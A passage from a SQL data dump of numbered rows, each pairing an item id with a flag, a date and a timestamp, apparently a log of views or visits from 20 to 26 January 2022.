18:26:10'),(43009,1872,1,'2022-01-20','2022-01-20 19:04:19'),(43010,4238,1,'2022-01-20','2022-01-20 19:12:31'),(43011,3072,1,'2022-01-20','2022-01-20 19:20:18'),(43012,3482,1,'2022-01-20','2022-01-20 19:25:55'),(43013,1739,1,'2022-01-20','2022-01-20 19:44:28'),(43014,3273,1,'2022-01-20','2022-01-20 19:45:38'),(43015,3273,1,'2022-01-20','2022-01-20 19:45:44'),(43016,4391,1,'2022-01-20','2022-01-20 19:46:50'),(43017,3072,1,'2022-01-20','2022-01-20 20:07:20'),(43018,1596,1,'2022-01-20','2022-01-20 20:10:10'),(43019,80,1,'2022-01-20','2022-01-20 20:46:12'),(43020,570,1,'2022-01-20','2022-01-20 20:48:37'),(43021,1544,1,'2022-01-20','2022-01-20 20:59:56'),(43022,87,1,'2022-01-20','2022-01-20 21:01:54'),(43023,1699,1,'2022-01-20','2022-01-20 21:09:57'),(43024,1544,1,'2022-01-20','2022-01-20 21:20:44'),(43025,2748,1,'2022-01-20','2022-01-20 21:34:26'),(43026,4326,1,'2022-01-20','2022-01-20 21:35:36'),(43027,467,1,'2022-01-20','2022-01-20 21:40:25'),(43028,1600,1,'2022-01-20','2022-01-20 21:42:05'),(43029,1600,1,'2022-01-20','2022-01-20 21:42:05'),(43030,335,1,'2022-01-20','2022-01-20 21:42:49'),(43031,72,1,'2022-01-20','2022-01-20 21:48:42'),(43032,4238,1,'2022-01-20','2022-01-20 21:57:27'),(43033,487,1,'2022-01-20','2022-01-20 22:01:44'),(43034,2813,1,'2022-01-20','2022-01-20 22:31:07'),(43035,4448,1,'2022-01-20','2022-01-20 22:34:04'),(43036,2989,1,'2022-01-20','2022-01-20 23:15:11'),(43037,2297,1,'2022-01-20','2022-01-20 23:33:44'),(43038,1614,1,'2022-01-20','2022-01-20 23:37:50'),(43039,1606,1,'2022-01-20','2022-01-20 23:46:08'),(43040,1606,1,'2022-01-20','2022-01-20 23:46:47'),(43041,1732,1,'2022-01-21','2022-01-21 00:13:25'),(43042,2748,1,'2022-01-21','2022-01-21 00:30:29'),(43043,1695,1,'2022-01-21','2022-01-21 00:59:20'),(43044,1602,1,'2022-01-21','2022-01-21 01:00:54'),(43045,1598,1,'2022-01-21','2022-01-21 01:12:09'),(43046,468,1,'2022-01-21','2022-01-21 01:25:57'),(43047,80,1,'2022-01-21','2022-01-21 01:55:40'),(43048,2293,1,'2022-01-21','2022-01-21 02:06:36'),(43049,4335,1,'2022-01-21','2022-01-21 02:52:38'),(43050,4529,1,'2022-01-21','2022-01-21 02:54:35'),(43051,4391,1,'2022-01-21','2022-01-21 02:54:46'),(43052,4529,1,'2022-01-21','2022-01-21 03:03:39'),(43053,3482,1,'2022-01-21','2022-01-21 03:57:20'),(43054,3482,1,'2022-01-21','2022-01-21 03:59:40'),(43055,3482,1,'2022-01-21','2022-01-21 03:59:41'),(43056,1604,1,'2022-01-21','2022-01-21 04:06:48'),(43057,4238,1,'2022-01-21','2022-01-21 04:18:32'),(43058,2748,1,'2022-01-21','2022-01-21 04:23:34'),(43059,72,1,'2022-01-21','2022-01-21 05:01:47'),(43060,2617,1,'2022-01-21','2022-01-21 05:38:44'),(43061,1606,1,'2022-01-21','2022-01-21 05:40:08'),(43062,1606,1,'2022-01-21','2022-01-21 05:41:44'),(43063,108,1,'2022-01-21','2022-01-21 06:01:10'),(43064,4496,1,'2022-01-21','2022-01-21 06:09:15'),(43065,1608,1,'2022-01-21','2022-01-21 06:12:31'),(43066,477,1,'2022-01-21','2022-01-21 07:10:36'),(43067,4238,1,'2022-01-21','2022-01-21 07:39:39'),(43068,1709,1,'2022-01-21','2022-01-21 07:50:55'),(43069,4387,1,'2022-01-21','2022-01-21 07:57:55'),(43070,2989,1,'2022-01-21','2022-01-21 08:16:53'),(43071,1606,1,'2022-01-21','2022-01-21 08:20:51'),(43072,1544,1,'2022-01-21','2022-01-21 08:25:33'),(43073,2309,1,'2022-01-21','2022-01-21 08:34:49'),(43074,470,1,'2022-01-21','2022-01-21 08:40:09'),(43075,1608,1,'2022-01-21','2022-01-21 08:40:22'),(43076,2159,1,'2022-01-21','2022-01-21 08:44:34'),(43077,1608,1,'2022-01-21','2022-01-21 08:48:13'),(43078,1606,1,'2022-01-21','2022-01-21 08:58:35'),(43079,1606,1,'2022-01-21','2022-01-21 08:59:41'),(43080,1602,1,'2022-01-21','2022-01-21 09:03:07'),(43081,2159,1,'2022-01-21','2022-01-21 09:08:00'),(43082,1695,1,'2022-01-21','2022-01-21 09:27:16'),(43083,1612,1,'2022-01-21','2022-01-21 09:48:21'),(43084,80,1,'2022-01-21','2022-01-21 10:12:09'),(43085,2297,1,'2022-01-21','2022-01-21 11:02:41'),(43086,467,1,'2022-01-21','2022-01-21 11:04:25'),(43087,3285,1,'2022-01-21','2022-01-21 11:11:44'),(43088,3285,1,'2022-01-21','2022-01-21 11:18:24'),(43089,3285,1,'2022-01-21','2022-01-21 11:25:39'),(43090,2297,1,'2022-01-21','2022-01-21 12:02:01'),(43091,1768,1,'2022-01-21','2022-01-21 12:07:01'),(43092,1594,1,'2022-01-21','2022-01-21 12:08:01'),(43093,1600,1,'2022-01-21','2022-01-21 12:19:06'),(43094,87,1,'2022-01-21','2022-01-21 12:31:40'),(43095,469,1,'2022-01-21','2022-01-21 12:57:57'),(43096,1604,1,'2022-01-21','2022-01-21 14:09:41'),(43097,3781,1,'2022-01-21','2022-01-21 14:21:24'),(43098,1606,1,'2022-01-21','2022-01-21 15:25:02'),(43099,1544,1,'2022-01-21','2022-01-21 15:40:04'),(43100,3072,1,'2022-01-21','2022-01-21 15:56:22'),(43101,3072,1,'2022-01-21','2022-01-21 15:57:43'),(43102,1709,1,'2022-01-21','2022-01-21 16:10:28'),(43103,1699,1,'2022-01-21','2022-01-21 16:24:55'),(43104,1602,1,'2022-01-21','2022-01-21 16:35:17'),(43105,2309,1,'2022-01-21','2022-01-21 17:07:29'),(43106,1602,1,'2022-01-21','2022-01-21 17:36:49'),(43107,1608,1,'2022-01-21','2022-01-21 17:39:44'),(43108,2813,1,'2022-01-21','2022-01-21 17:55:23'),(43109,469,1,'2022-01-21','2022-01-21 18:13:17'),(43110,469,1,'2022-01-21','2022-01-21 18:14:17'),(43111,84,1,'2022-01-21','2022-01-21 18:15:11'),(43112,76,1,'2022-01-21','2022-01-21 18:15:17'),(43113,3694,1,'2022-01-21','2022-01-21 18:15:50'),(43114,84,1,'2022-01-21','2022-01-21 18:16:11'),(43115,87,1,'2022-01-21','2022-01-21 18:16:42'),(43116,488,1,'2022-01-21','2022-01-21 18:17:12'),(43117,87,1,'2022-01-21','2022-01-21 18:17:31'),(43118,480,1,'2022-01-21','2022-01-21 18:17:38'),(43119,87,1,'2022-01-21','2022-01-21 18:17:48'),(43120,473,1,'2022-01-21','2022-01-21 18:18:01'),(43121,87,1,'2022-01-21','2022-01-21 18:18:07'),(43122,483,1,'2022-01-21','2022-01-21 18:18:20'),(43123,87,1,'2022-01-21','2022-01-21 18:18:24'),(43124,1594,1,'2022-01-21','2022-01-21 18:22:33'),(43125,570,1,'2022-01-21','2022-01-21 18:37:23'),(43126,1598,1,'2022-01-21','2022-01-21 18:41:49'),(43127,2457,1,'2022-01-21','2022-01-21 19:17:50'),(43128,3045,1,'2022-01-21','2022-01-21 19:24:29'),(43129,1718,1,'2022-01-21','2022-01-21 19:36:06'),(43130,3664,1,'2022-01-21','2022-01-21 19:48:51'),(43131,84,1,'2022-01-21','2022-01-21 19:49:02'),(43132,1614,1,'2022-01-21','2022-01-21 19:54:34'),(43133,1602,1,'2022-01-21','2022-01-21 20:00:29'),(43134,80,1,'2022-01-21','2022-01-21 20:05:58'),(43135,2617,1,'2022-01-21','2022-01-21 20:08:48'),(43136,2159,1,'2022-01-21','2022-01-21 20:15:55'),(43137,2617,1,'2022-01-21','2022-01-21 20:15:57'),(43138,1600,1,'2022-01-21','2022-01-21 20:15:59'),(43139,1718,1,'2022-01-21','2022-01-21 20:16:36'),(43140,3764,1,'2022-01-21','2022-01-21 20:16:49'),(43141,4448,1,'2022-01-21','2022-01-21 20:18:26'),(43142,4448,1,'2022-01-21','2022-01-21 20:18:27'),(43143,4238,1,'2022-01-21','2022-01-21 20:19:24'),(43144,1612,1,'2022-01-21','2022-01-21 20:19:52'),(43145,1877,1,'2022-01-21','2022-01-21 20:24:25'),(43146,570,1,'2022-01-21','2022-01-21 20:43:58'),(43147,1600,1,'2022-01-21','2022-01-21 20:47:24'),(43148,68,1,'2022-01-21','2022-01-21 20:47:31'),(43149,1582,1,'2022-01-21','2022-01-21 20:56:42'),(43150,469,1,'2022-01-21','2022-01-21 21:03:20'),(43151,1870,1,'2022-01-21','2022-01-21 21:03:28'),(43152,4520,1,'2022-01-21','2022-01-21 21:07:21'),(43153,72,1,'2022-01-21','2022-01-21 21:29:53'),(43154,1872,1,'2022-01-21','2022-01-21 21:48:52'),(43155,570,1,'2022-01-21','2022-01-21 22:06:37'),(43156,3781,1,'2022-01-21','2022-01-21 22:10:36'),(43157,470,1,'2022-01-21','2022-01-21 22:31:39'),(43158,2989,1,'2022-01-21','2022-01-21 23:03:59'),(43159,477,1,'2022-01-21','2022-01-21 23:05:44'),(43160,4529,1,'2022-01-21','2022-01-21 23:55:56'),(43161,89,1,'2022-01-22','2022-01-22 01:04:25'),(43162,2309,1,'2022-01-22','2022-01-22 02:10:42'),(43163,1602,1,'2022-01-22','2022-01-22 03:40:39'),(43164,1586,1,'2022-01-22','2022-01-22 04:10:37'),(43165,3691,1,'2022-01-22','2022-01-22 05:10:37'),(43166,469,1,'2022-01-22','2022-01-22 05:32:59'),(43167,1588,1,'2022-01-22','2022-01-22 05:40:41'),(43168,2309,1,'2022-01-22','2022-01-22 05:55:40'),(43169,472,1,'2022-01-22','2022-01-22 06:10:38'),(43170,1598,1,'2022-01-22','2022-01-22 06:25:38'),(43171,1604,1,'2022-01-22','2022-01-22 06:40:42'),(43172,1602,1,'2022-01-22','2022-01-22 06:55:42'),(43173,2457,1,'2022-01-22','2022-01-22 07:10:37'),(43174,1602,1,'2022-01-22','2022-01-22 07:18:53'),(43175,3030,1,'2022-01-22','2022-01-22 07:25:43'),(43176,2159,1,'2022-01-22','2022-01-22 07:33:03'),(43177,1600,1,'2022-01-22','2022-01-22 07:33:06'),(43178,3282,1,'2022-01-22','2022-01-22 07:33:13'),(43179,1582,1,'2022-01-22','2022-01-22 07:34:16'),(43180,2609,1,'2022-01-22','2022-01-22 07:43:56'),(43181,2813,1,'2022-01-22','2022-01-22 07:59:54'),(43182,2159,1,'2022-01-22','2022-01-22 08:03:01'),(43183,1608,1,'2022-01-22','2022-01-22 08:03:03'),(43184,1612,1,'2022-01-22','2022-01-22 08:08:29'),(43185,1592,1,'2022-01-22','2022-01-22 08:17:18'),(43186,3781,1,'2022-01-22','2022-01-22 08:25:39'),(43187,1586,1,'2022-01-22','2022-01-22 08:34:12'),(43188,80,1,'2022-01-22','2022-01-22 08:42:53'),(43189,3764,1,'2022-01-22','2022-01-22 08:51:21'),(43190,1877,1,'2022-01-22','2022-01-22 09:00:02'),(43191,1872,1,'2022-01-22','2022-01-22 09:03:00'),(43192,1614,1,'2022-01-22','2022-01-22 09:09:02'),(43193,2309,1,'2022-01-22','2022-01-22 10:10:02'),(43194,1600,1,'2022-01-22','2022-01-22 10:17:19'),(43195,1594,1,'2022-01-22','2022-01-22 12:08:35'),(43196,72,1,'2022-01-22','2022-01-22 12:25:26'),(43197,570,1,'2022-01-22','2022-01-22 13:29:29'),(43198,570,1,'2022-01-22','2022-01-22 13:33:18'),(43199,1586,1,'2022-01-22','2022-01-22 14:29:56'),(43200,3691,1,'2022-01-22','2022-01-22 15:38:31'),(43201,2704,1,'2022-01-22','2022-01-22 15:53:22'),(43202,570,1,'2022-01-22','2022-01-22 15:57:42'),(43203,469,1,'2022-01-22','2022-01-22 16:08:28'),(43204,1588,1,'2022-01-22','2022-01-22 16:28:30'),(43205,472,1,'2022-01-22','2022-01-22 16:38:31'),(43206,2309,1,'2022-01-22','2022-01-22 16:48:29'),(43207,1604,1,'2022-01-22','2022-01-22 16:58:28'),(43208,1598,1,'2022-01-22','2022-01-22 17:08:31'),(43209,3030,1,'2022-01-22','2022-01-22 17:18:55'),(43210,1586,1,'2022-01-22','2022-01-22 17:28:29'),(43211,1582,1,'2022-01-22','2022-01-22 17:38:29'),(43212,2457,1,'2022-01-22','2022-01-22 17:48:27'),(43213,1602,1,'2022-01-22','2022-01-22 17:58:47'),(43214,1600,1,'2022-01-22','2022-01-22 18:08:07'),(43215,2159,1,'2022-01-22','2022-01-22 18:08:38'),(43216,2309,1,'2022-01-22','2022-01-22 18:13:30'),(43217,3781,1,'2022-01-22','2022-01-22 18:28:29'),(43218,2159,1,'2022-01-22','2022-01-22 18:38:08'),(43219,2609,1,'2022-01-22','2022-01-22 18:43:30'),(43220,1610,1,'2022-01-22','2022-01-22 18:54:27'),(43221,3664,1,'2022-01-22','2022-01-22 19:08:07'),(43222,2813,1,'2022-01-22','2022-01-22 19:13:48'),(43223,1592,1,'2022-01-22','2022-01-22 19:28:29'),(43224,1602,1,'2022-01-22','2022-01-22 19:43:28'),(43225,1612,1,'2022-01-22','2022-01-22 20:08:57'),(43226,1872,1,'2022-01-22','2022-01-22 20:22:59'),(43227,72,1,'2022-01-22','2022-01-22 21:22:53'),(43228,4238,1,'2022-01-22','2022-01-22 21:47:08'),(43229,1608,1,'2022-01-22','2022-01-22 22:02:08'),(43230,473,1,'2022-01-22','2022-01-22 22:09:39'),(43231,4542,1,'2022-01-22','2022-01-22 22:41:31'),(43232,2804,1,'2022-01-22','2022-01-22 23:08:02'),(43233,4416,1,'2022-01-23','2022-01-23 00:03:57'),(43234,1586,1,'2022-01-23','2022-01-23 00:50:23'),(43235,3691,1,'2022-01-23','2022-01-23 01:02:24'),(43236,1604,1,'2022-01-23','2022-01-23 01:20:24'),(43237,469,1,'2022-01-23','2022-01-23 01:44:23'),(43238,1594,1,'2022-01-23','2022-01-23 01:56:25'),(43239,2309,1,'2022-01-23','2022-01-23 02:08:23'),(43240,472,1,'2022-01-23','2022-01-23 02:20:24'),(43241,469,1,'2022-01-23','2022-01-23 02:32:25'),(43242,1588,1,'2022-01-23','2022-01-23 02:44:35'),(43243,1588,1,'2022-01-23','2022-01-23 02:56:23'),(43244,1770,1,'2022-01-23','2022-01-23 03:04:54'),(43245,1598,1,'2022-01-23','2022-01-23 03:08:23'),(43246,3030,1,'2022-01-23','2022-01-23 03:20:23'),(43247,2309,1,'2022-01-23','2022-01-23 03:32:26'),(43248,1602,1,'2022-01-23','2022-01-23 03:44:23'),(43249,1604,1,'2022-01-23','2022-01-23 03:56:23'),(43250,1582,1,'2022-01-23','2022-01-23 04:20:22'),(43251,2769,1,'2022-01-23','2022-01-23 04:32:22'),(43252,2457,1,'2022-01-23','2022-01-23 04:56:23'),(43253,1600,1,'2022-01-23','2022-01-23 05:04:54'),(43254,2813,1,'2022-01-23','2022-01-23 05:08:26'),(43255,1586,1,'2022-01-23','2022-01-23 05:20:23'),(43256,2751,1,'2022-01-23','2022-01-23 05:32:24'),(43257,1722,1,'2022-01-23','2022-01-23 05:44:23'),(43258,2248,1,'2022-01-23','2022-01-23 06:08:23'),(43259,3781,1,'2022-01-23','2022-01-23 06:20:26'),(43260,1602,1,'2022-01-23','2022-01-23 06:31:52'),(43261,2159,1,'2022-01-23','2022-01-23 06:36:30'),(43262,1596,1,'2022-01-23','2022-01-23 06:44:24'),(43263,570,1,'2022-01-23','2022-01-23 06:56:24'),(43264,1612,1,'2022-01-23','2022-01-23 07:20:30'),(43265,1614,1,'2022-01-23','2022-01-23 07:32:23'),(43266,80,1,'2022-01-23','2022-01-23 07:56:23'),(43267,1592,1,'2022-01-23','2022-01-23 08:08:23'),(43268,2609,1,'2022-01-23','2022-01-23 08:44:22'),(43269,1877,1,'2022-01-23','2022-01-23 09:08:23'),(43270,472,1,'2022-01-23','2022-01-23 09:20:29'),(43271,3691,1,'2022-01-23','2022-01-23 09:32:23'),(43272,1596,1,'2022-01-23','2022-01-23 10:32:23'),(43273,68,1,'2022-01-23','2022-01-23 10:56:26'),(43274,1598,1,'2022-01-23','2022-01-23 11:08:23'),(43275,4457,1,'2022-01-23','2022-01-23 11:19:31'),(43276,470,1,'2022-01-23','2022-01-23 11:20:23'),(43277,1596,1,'2022-01-23','2022-01-23 11:25:41'),(43278,1602,1,'2022-01-23','2022-01-23 11:32:35'),(43279,3030,1,'2022-01-23','2022-01-23 11:44:24'),(43280,1588,1,'2022-01-23','2022-01-23 11:50:39'),(43281,4400,1,'2022-01-23','2022-01-23 11:59:11'),(43282,1582,1,'2022-01-23','2022-01-23 12:20:23'),(43283,2801,1,'2022-01-23','2022-01-23 12:32:57'),(43284,468,1,'2022-01-23','2022-01-23 12:44:23'),(43285,1604,1,'2022-01-23','2022-01-23 12:50:43'),(43286,2813,1,'2022-01-23','2022-01-23 12:56:22'),(43287,2989,1,'2022-01-23','2022-01-23 13:20:25'),(43288,2769,1,'2022-01-23','2022-01-23 13:32:21'),(43289,2159,1,'2022-01-23','2022-01-23 13:56:23'),(43290,2159,1,'2022-01-23','2022-01-23 14:26:23'),(43291,3781,1,'2022-01-23','2022-01-23 14:44:46'),(43292,1594,1,'2022-01-23','2022-01-23 15:46:44'),(43293,1604,1,'2022-01-23','2022-01-23 16:50:07'),(43294,472,1,'2022-01-23','2022-01-23 17:21:47'),(43295,3430,1,'2022-01-23','2022-01-23 17:51:10'),(43296,3664,1,'2022-01-23','2022-01-23 17:53:54'),(43297,1608,1,'2022-01-23','2022-01-23 18:02:05'),(43298,1586,1,'2022-01-23','2022-01-23 18:06:57'),(43299,3691,1,'2022-01-23','2022-01-23 18:22:58'),(43300,1586,1,'2022-01-23','2022-01-23 18:28:02'),(43301,469,1,'2022-01-23','2022-01-23 18:42:52'),(43302,1598,1,'2022-01-23','2022-01-23 18:50:24'),(43303,2457,1,'2022-01-23','2022-01-23 19:05:10'),(43304,1602,1,'2022-01-23','2022-01-23 19:19:39'),(43305,2769,1,'2022-01-23','2022-01-23 19:35:06'),(43306,1582,1,'2022-01-23','2022-01-23 19:49:43'),(43307,2813,1,'2022-01-23','2022-01-23 20:04:52'),(43308,1594,1,'2022-01-23','2022-01-23 20:24:54'),(43309,1612,1,'2022-01-23','2022-01-23 20:44:52'),(43310,2309,1,'2022-01-23','2022-01-23 21:04:40'),(43311,1598,1,'2022-01-23','2022-01-23 21:24:10'),(43312,570,1,'2022-01-23','2022-01-23 21:24:38'),(43313,1596,1,'2022-01-23','2022-01-23 22:04:41'),(43314,2751,1,'2022-01-23','2022-01-23 22:24:39'),(43315,1602,1,'2022-01-23','2022-01-23 22:44:38'),(43316,1602,1,'2022-01-23','2022-01-23 22:52:51'),(43317,469,1,'2022-01-23','2022-01-23 23:04:38'),(43318,80,1,'2022-01-23','2022-01-23 23:24:53'),(43319,1588,1,'2022-01-23','2022-01-23 23:44:41'),(43320,1596,1,'2022-01-24','2022-01-24 00:32:28'),(43321,1606,1,'2022-01-24','2022-01-24 00:42:02'),(43322,3005,1,'2022-01-24','2022-01-24 01:25:51'),(43323,1594,1,'2022-01-24','2022-01-24 01:48:59'),(43324,1614,1,'2022-01-24','2022-01-24 02:48:49'),(43325,1602,1,'2022-01-24','2022-01-24 03:17:37'),(43326,80,1,'2022-01-24','2022-01-24 03:17:47'),(43327,91,1,'2022-01-24','2022-01-24 03:18:31'),(43328,68,1,'2022-01-24','2022-01-24 04:05:34'),(43329,1598,1,'2022-01-24','2022-01-24 04:33:16'),(43330,80,1,'2022-01-24','2022-01-24 05:18:20'),(43331,1602,1,'2022-01-24','2022-01-24 05:18:22'),(43332,2457,1,'2022-01-24','2022-01-24 05:21:47'),(43333,2159,1,'2022-01-24','2022-01-24 06:08:21'),(43334,1608,1,'2022-01-24','2022-01-24 06:08:24'),(43335,1596,1,'2022-01-24','2022-01-24 06:19:42'),(43336,72,1,'2022-01-24','2022-01-24 06:24:12'),(43337,3781,1,'2022-01-24','2022-01-24 06:25:13'),(43338,2297,1,'2022-01-24','2022-01-24 06:27:33'),(43339,1592,1,'2022-01-24','2022-01-24 06:31:11'),(43340,1614,1,'2022-01-24','2022-01-24 06:36:30'),(43341,2248,1,'2022-01-24','2022-01-24 06:53:25'),(43342,1586,1,'2022-01-24','2022-01-24 07:04:31'),(43343,1877,1,'2022-01-24','2022-01-24 07:15:52'),(43344,470,1,'2022-01-24','2022-01-24 07:38:14'),(43345,68,1,'2022-01-24','2022-01-24 07:49:29'),(43346,2609,1,'2022-01-24','2022-01-24 09:43:52'),(43347,2410,1,'2022-01-24','2022-01-24 09:49:27'),(43348,1582,1,'2022-01-24','2022-01-24 10:29:45'),(43349,1737,1,'2022-01-24','2022-01-24 10:44:07'),(43350,1737,1,'2022-01-24','2022-01-24 10:44:24'),(43351,1737,1,'2022-01-24','2022-01-24 10:44:50'),(43352,1737,1,'2022-01-24','2022-01-24 10:45:28'),(43353,1739,1,'2022-01-24','2022-01-24 10:53:21'),(43354,1739,1,'2022-01-24','2022-01-24 10:53:51'),(43355,4529,1,'2022-01-24','2022-01-24 11:50:48'),(43356,3764,1,'2022-01-24','2022-01-24 11:51:16'),(43357,4524,1,'2022-01-24','2022-01-24 11:51:18'),(43358,2309,1,'2022-01-24','2022-01-24 12:41:24'),(43359,1612,1,'2022-01-24','2022-01-24 13:11:35'),(43360,4457,1,'2022-01-24','2022-01-24 13:11:41'),(43361,72,1,'2022-01-24','2022-01-24 13:12:14'),(43362,76,1,'2022-01-24','2022-01-24 13:16:30'),(43363,1602,1,'2022-01-24','2022-01-24 13:41:20'),(43364,4457,1,'2022-01-24','2022-01-24 14:21:26'),(43365,3691,1,'2022-01-24','2022-01-24 14:53:50'),(43366,472,1,'2022-01-24','2022-01-24 15:53:37'),(43367,1604,1,'2022-01-24','2022-01-24 16:07:11'),(43368,1598,1,'2022-01-24','2022-01-24 16:10:21'),(43369,2813,1,'2022-01-24','2022-01-24 16:13:43'),(43370,1582,1,'2022-01-24','2022-01-24 16:33:29'),(43371,2769,1,'2022-01-24','2022-01-24 16:43:28'),(43372,3313,1,'2022-01-24','2022-01-24 17:00:08'),(43373,1612,1,'2022-01-24','2022-01-24 17:13:22'),(43374,2989,1,'2022-01-24','2022-01-24 17:23:43'),(43375,1602,1,'2022-01-24','2022-01-24 17:43:29'),(43376,468,1,'2022-01-24','2022-01-24 17:54:43'),(43377,1596,1,'2022-01-24','2022-01-24 18:24:24'),(43378,4517,1,'2022-01-24','2022-01-24 18:53:22'),(43379,1602,1,'2022-01-24','2022-01-24 18:55:58'),(43380,477,1,'2022-01-24','2022-01-24 19:08:23'),(43381,3482,1,'2022-01-24','2022-01-24 21:19:22'),(43382,1600,1,'2022-01-24','2022-01-24 21:19:29'),(43383,108,1,'2022-01-24','2022-01-24 21:19:31'),(43384,72,1,'2022-01-24','2022-01-24 21:38:35'),(43385,1586,1,'2022-01-24','2022-01-24 21:49:22'),(43386,2309,1,'2022-01-24','2022-01-24 22:19:20'),(43387,1544,1,'2022-01-24','2022-01-24 22:21:31'),(43388,2297,1,'2022-01-24','2022-01-24 22:55:45'),(43389,2159,1,'2022-01-24','2022-01-24 23:01:03'),(43390,1594,1,'2022-01-25','2022-01-25 00:08:28'),(43391,1594,1,'2022-01-25','2022-01-25 00:08:56'),(43392,1870,1,'2022-01-25','2022-01-25 00:56:56'),(43393,1870,1,'2022-01-25','2022-01-25 00:58:04'),(43394,3691,1,'2022-01-25','2022-01-25 01:09:31'),(43395,1594,1,'2022-01-25','2022-01-25 02:09:54'),(43396,1594,1,'2022-01-25','2022-01-25 02:28:42'),(43397,1592,1,'2022-01-25','2022-01-25 02:39:24'),(43398,1582,1,'2022-01-25','2022-01-25 03:16:27'),(43399,1600,1,'2022-01-25','2022-01-25 03:17:27'),(43400,3006,1,'2022-01-25','2022-01-25 03:27:36'),(43401,472,1,'2022-01-25','2022-01-25 03:33:27'),(43402,1588,1,'2022-01-25','2022-01-25 03:48:21'),(43403,1586,1,'2022-01-25','2022-01-25 04:48:22'),(43404,1606,1,'2022-01-25','2022-01-25 04:48:32'),(43405,469,1,'2022-01-25','2022-01-25 05:08:23'),(43406,3257,1,'2022-01-25','2022-01-25 05:53:23'),(43407,72,1,'2022-01-25','2022-01-25 06:14:35'),(43408,80,1,'2022-01-25','2022-01-25 06:36:59'),(43409,80,1,'2022-01-25','2022-01-25 06:53:29'),(43410,2248,1,'2022-01-25','2022-01-25 07:49:29'),(43411,1594,1,'2022-01-25','2022-01-25 08:00:01'),(43412,2609,1,'2022-01-25','2022-01-25 08:34:28'),(43413,1596,1,'2022-01-25','2022-01-25 09:08:24'),(43414,1612,1,'2022-01-25','2022-01-25 09:51:06'),(43415,1612,1,'2022-01-25','2022-01-25 09:58:03'),(43416,1586,1,'2022-01-25','2022-01-25 11:16:12'),(43417,1582,1,'2022-01-25','2022-01-25 11:23:59'),(43418,1602,1,'2022-01-25','2022-01-25 11:44:38'),(43419,1600,1,'2022-01-25','2022-01-25 12:32:20'),(43420,2309,1,'2022-01-25','2022-01-25 12:57:32'),(43421,1724,1,'2022-01-25','2022-01-25 13:04:24'),(43422,1724,1,'2022-01-25','2022-01-25 13:05:02'),(43423,1724,1,'2022-01-25','2022-01-25 13:06:39'),(43424,1724,1,'2022-01-25','2022-01-25 13:07:09'),(43425,1588,1,'2022-01-25','2022-01-25 13:08:26'),(43426,1718,1,'2022-01-25','2022-01-25 13:16:38'),(43427,1718,1,'2022-01-25','2022-01-25 13:17:02'),(43428,1718,1,'2022-01-25','2022-01-25 13:17:27'),(43429,2159,1,'2022-01-25','2022-01-25 13:18:28'),(43430,1718,1,'2022-01-25','2022-01-25 13:21:09'),(43431,1602,1,'2022-01-25','2022-01-25 13:24:25'),(43432,89,1,'2022-01-25','2022-01-25 13:41:25'),(43433,87,1,'2022-01-25','2022-01-25 13:41:50'),(43434,91,1,'2022-01-25','2022-01-25 13:42:06'),(43435,89,1,'2022-01-25','2022-01-25 13:42:52'),(43436,1582,1,'2022-01-25','2022-01-25 13:43:15'),(43437,4457,1,'2022-01-25','2022-01-25 15:22:14'),(43438,4457,1,'2022-01-25','2022-01-25 15:26:37'),(43439,1602,1,'2022-01-25','2022-01-25 15:45:33'),(43440,80,1,'2022-01-25','2022-01-25 15:46:24'),(43441,1602,1,'2022-01-25','2022-01-25 15:49:34'),(43442,2609,1,'2022-01-25','2022-01-25 16:08:13'),(43443,2609,1,'2022-01-25','2022-01-25 16:08:29'),(43444,2609,1,'2022-01-25','2022-01-25 16:08:37'),(43445,2609,1,'2022-01-25','2022-01-25 16:09:24'),(43446,2609,1,'2022-01-25','2022-01-25 16:09:35'),(43447,91,1,'2022-01-25','2022-01-25 16:09:47'),(43448,3251,1,'2022-01-25','2022-01-25 16:10:15'),(43449,3251,1,'2022-01-25','2022-01-25 16:10:23'),(43450,1598,1,'2022-01-25','2022-01-25 17:20:25'),(43451,1586,1,'2022-01-25','2022-01-25 17:43:29'),(43452,3781,1,'2022-01-25','2022-01-25 17:56:26'),(43453,1582,1,'2022-01-25','2022-01-25 18:24:41'),(43454,2309,1,'2022-01-25','2022-01-25 18:33:06'),(43455,3691,1,'2022-01-25','2022-01-25 18:44:24'),(43456,1586,1,'2022-01-25','2022-01-25 19:46:43'),(43457,1586,1,'2022-01-25','2022-01-25 19:59:35'),(43458,467,1,'2022-01-25','2022-01-25 20:34:25'),(43459,2457,1,'2022-01-25','2022-01-25 21:08:04'),(43460,1586,1,'2022-01-25','2022-01-25 21:26:43'),(43461,72,1,'2022-01-25','2022-01-25 21:29:05'),(43462,1598,1,'2022-01-25','2022-01-25 21:39:42'),(43463,1586,1,'2022-01-25','2022-01-25 21:49:26'),(43464,1586,1,'2022-01-25','2022-01-25 21:55:47'),(43465,76,1,'2022-01-25','2022-01-25 22:24:28'),(43466,1598,1,'2022-01-26','2022-01-26 02:23:00'),(43467,4529,1,'2022-01-26','2022-01-26 02:46:58'),(43468,1604,1,'2022-01-26','2022-01-26 03:11:00'),(43469,108,1,'2022-01-26','2022-01-26 03:13:03'),(43470,4561,1,'2022-01-26','2022-01-26 04:01:31'),(43471,1606,1,'2022-01-26','2022-01-26 04:13:05'),(43472,4404,1,'2022-01-26','2022-01-26 04:13:11'),(43473,1586,1,'2022-01-26','2022-01-26 05:12:57'),(43474,2297,1,'2022-01-26','2022-01-26 05:16:26'),(43475,1600,1,'2022-01-26','2022-01-26 05:19:15'),(43476,89,1,'2022-01-26','2022-01-26 05:45:44'),(43477,2297,1,'2022-01-26','2022-01-26 06:15:32'),(43478,1594,1,'2022-01-26','2022-01-26 06:43:52'),(43479,2704,1,'2022-01-26','2022-01-26 07:05:35'),(43480,472,1,'2022-01-26','2022-01-26 07:14:11'),(43481,472,1,'2022-01-26','2022-01-26 07:48:48'),(43482,3030,1,'2022-01-26','2022-01-26 08:24:50'),(43483,1544,1,'2022-01-26','2022-01-26 08:50:52'),(43484,2769,1,'2022-01-26','2022-01-26 09:13:12'),(43485,4457,1,'2022-01-26','2022-01-26 09:23:54'),(43486,4524,1,'2022-01-26','2022-01-26 09:24:48'),(43487,1606,1,'2022-01-26','2022-01-26 09:43:02'),(43488,1594,1,'2022-01-26','2022-01-26 10:05:14'),(43489,2609,1,'2022-01-26','2022-01-26 10:48:49'),(43490,1544,1,'2022-01-26','2022-01-26 11:07:06'),(43491,91,1,'2022-01-26','2022-01-26 11:12:05'),(43492,4424,1,'2022-01-26','2022-01-26 11:14:47'),(43493,4424,1,'2022-01-26','2022-01-26 11:14:49'),(43494,72,1,'2022-01-26','2022-01-26 11:31:00'),(43495,1544,1,'2022-01-26','2022-01-26 